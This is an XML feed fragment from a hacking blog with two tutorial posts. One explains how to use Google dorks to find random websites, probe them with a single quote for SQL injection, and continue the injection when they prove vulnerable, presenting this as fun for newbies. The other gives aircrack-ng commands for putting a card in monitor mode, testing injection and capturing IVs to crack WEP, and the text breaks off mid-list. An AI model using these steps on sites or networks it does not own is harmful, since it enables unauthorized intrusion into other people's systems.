href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5029529640256643019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/5029529640256643019'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/what-are-trojan-worm-virus-logic-bomb.html' title='What are Trojan / Worm / Virus / Logic Bomb??'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-Aa9yD5pBG-s/T1ibjP0qCGI/AAAAAAAAFK4/V2CcslaosSg/s72-c/Albania+is+the+most+Malware+infected+Nation.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-3173691896415337073</id><published>2012-03-12T12:09:00.000+05:30</published><updated>2012-03-13T06:53:07.539+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>How to find a Vulnerable Website and Start Hacking ??</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;293&quot; src=&quot;http://4.bp.blogspot.com/_IV3tVSnCgek/TXb30IQ3kPI/AAAAAAAAAmQ/RcY_pZ-fBt0/14913_NpAdvHover%5B10%5D.jpg&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;color: #eeeeee; font-family: Verdana;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: #eeeeee; font-family: Verdana;&quot;&gt;Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #eeeeee; font-family: Verdana;&quot;&gt;Many newbies don&#39;t know that how to find security holes in random sites..??&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #eeeeee; font-family: Verdana;&quot;&gt;Now here is an easy way to do so.. :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;color: #eeeeee; line-height: 19px;&quot;&gt;&lt;br /&gt;Follow the following steps.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Verdana; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Verdana; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;color: #333333; font-family: Verdana; font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1-) First go to &lt;a href=&quot;http://www.google.com/&quot;&gt;http://www.google.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2-) Press on the right, next to the textfield, on &quot;Advanced Search&quot;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;224&quot; src=&quot;http://i47.tinypic.com/2nbf67c.png&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3-) Fill in your dork at &quot;This exact wording or phrase&quot;.&lt;br /&gt;&amp;nbsp; &amp;nbsp; Results per page: 100 results (Or less depending on your internet speed.)&lt;br /&gt;&amp;nbsp; &amp;nbsp; Language: Could be all languages or one language. I choose Dutch&lt;br /&gt;because I&#39;m Dutch myself and I got a Dutch ISP so those sites will load&lt;br /&gt;faster.&lt;br /&gt;&amp;nbsp; &amp;nbsp; Where your keywords show up: &quot;in the URL of the page&quot;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4-) Press search.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5-) Now we get this:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;178&quot; src=&quot;http://i47.tinypic.com/2z5uqvl.png&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7-) Open the tabs and add as example a single quote behind the link.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8-) If it&#39;s vulnerable continue your injection else repeat step 5 -&amp;gt; 6.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Very easy :)&amp;nbsp;Isn&#39;t&amp;nbsp;it..??? :P&lt;br /&gt;&lt;br /&gt;This was for some random sites,but for specific target sites various&amp;nbsp;Web Security Scanners can be used.&lt;br /&gt;One of the popular&amp;nbsp;Web Security Scanner is &lt;a href=&quot;http://www.acunetix.com/vulnerability-scanner/&quot;&gt;Acunetix&amp;nbsp;Web Security Scanner&lt;/a&gt;.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/3173691896415337073/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-find-vulnerable-website-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3173691896415337073'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3173691896415337073'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-find-vulnerable-website-and.html' title='How to find a Vulnerable Website and Start Hacking ??'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_IV3tVSnCgek/TXb30IQ3kPI/AAAAAAAAAmQ/RcY_pZ-fBt0/s72-c/14913_NpAdvHover%5B10%5D.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-4643301901324511347</id><published>2012-03-10T15:18:00.000+05:30</published><updated>2012-03-14T16:50:11.375+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi"/><title type='text'>How To Crack WiFi WEP With Packet Injection</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://img.hackintruths.org/2011/10/wifi_hACKED-400x274.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://img.hackintruths.org/2011/10/wifi_hACKED-400x274.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; clear: both; color: #2d2d2d; font-family: &#39;Century Gothic&#39;; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   &lt;/h3&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Intro&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;By now most people have wireless networks at home. A lot of them may have experienced leechers or have leeched themselves through an open network. An easy way to prevent that from happening is to encrypt your network traffic. One of these methods is by use of WEP or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Background&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;WEP was designed to provide similar privacy that a user would have if they were wired to their network. The way it works is it uses either a 64-bit or 128-bit encryption key and follows the RC4 symmetric encryption standard. 24 bits of the key are used for an IV which is intended to encrypt each packet with a different key. The remaining bits are for your PSK; limiting your key strength to 40 or 104 bits.&lt;/span&gt;&lt;br /&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;How it works&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;The transmitting station appends the PSK to the IV to create the seed. The seed is pushed through a PRNG to generate a stream of random data. The random data is then passed to a function to perform a binary logic XOR against the plain text to create the cipher text. The cipher text is then appended to the IV with an indicator bit stating that is is an encrypted packet and is sent through the airway. The receiving station looks for the encrypted bit and extracts the IV if found. The IV is attached to the PSK and passed through the PRNG algorithm to obtain the same stream of random data the transmitting station generated. This stream of data is then passed through the same XOR function to reverse the encryption and leave you with the plain text.&lt;/span&gt;&lt;br /&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;What’s the problem?&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;The problem is that for efficiency an IV isn’t very large. This creates a problem of running out of unique keys effectively exposing the PSK. A busy AP will run out of unique keys in a few hours and an attacker can be sitting and collecting data the whole time, or they can take a more aggressive approach and have all the information they need in a few minutes by use of packet injection.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;The other downfall is that WEP only encrypts the payload and not the entire packet. This leaves the header information in plain text giving away information that can be very useful for an attacker.&lt;/span&gt;&lt;br /&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;How is it done?&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;There are tools available to crack the encryption on an IV collection. It’s as easy as sitting around listening to network traffic and then running a program once you have enough data. That’s all there is to a passive attack.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;Sitting around and waiting for a network to give you enough data by itself can take hours or even days. The process can be sped up to a matter of minutes by injecting the network with fake packets. This is done by setting your wireless card to monitor mode and pretending to be an actual user of the network trying to establish a connection.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;The tool I am going to use in this example is&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.aircrack-ng.org/&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; color: #0167ab; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot; title=&quot;AirCrack&quot;&gt;AirCrack&lt;/a&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;. It is an entire suite designed for testing and breaking through protections on a wireless network. I don’t suggest attempting to use this tool in a Windows environment. The tools and driver support isn’t as readily available. I do recommend to Windows users to take a look at the&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.backtrack-linux.org/&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; color: #0167ab; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot; title=&quot;Backtrack&quot;&gt;Backtrack&lt;/a&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;&amp;nbsp;Linux live environment. It can be run off of portable media such as a&amp;nbsp;&lt;/span&gt;&lt;acronym style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot; title=&quot;Digital Versatile Disc&quot;&gt;DVD&lt;/acronym&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;&amp;nbsp;or flash drive.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Set your wireless card into monitor mode.&lt;/h4&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;You need to have a wireless card that supports monitor mode. Monitor mode allows you to listen to all packets instead of only packets intended for you. This is done by creating a virtual interface to act as a second wireless adapter using the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.&lt;/span&gt;&lt;br /&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Take the interface down:&lt;/h4&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# ifconfig wlan0 down&lt;/pre&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;Bring the interface back up in monitor mode:&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# airmon-ng start wlan0&lt;/pre&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Test injection capabilities:&lt;/h4&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0&lt;/pre&gt;&lt;ul style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; margin-bottom: 10px; margin-left: 20px; margin-right: 0px; margin-top: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; z-index: 40;&quot;&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;-9 tells aireplay to test injection&lt;/li&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;-e is the ESSID of the AP&lt;/li&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;-a is the BSSID (MAC Address) of the AP&lt;/li&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;mon0 is my interface in monitor mode&lt;/li&gt;&lt;/ul&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Start grabbing IVs:&lt;/h4&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# airodump-ng --bssid 00:11:22:33:44:55 -w ESSID mon0&lt;/pre&gt;&lt;ul style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; margin-bottom: 10px; margin-left: 20px; margin-right: 0px; margin-top: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; z-index: 30;&quot;&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;–bssid is the MAC Address of the AP&lt;/li&gt;&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; 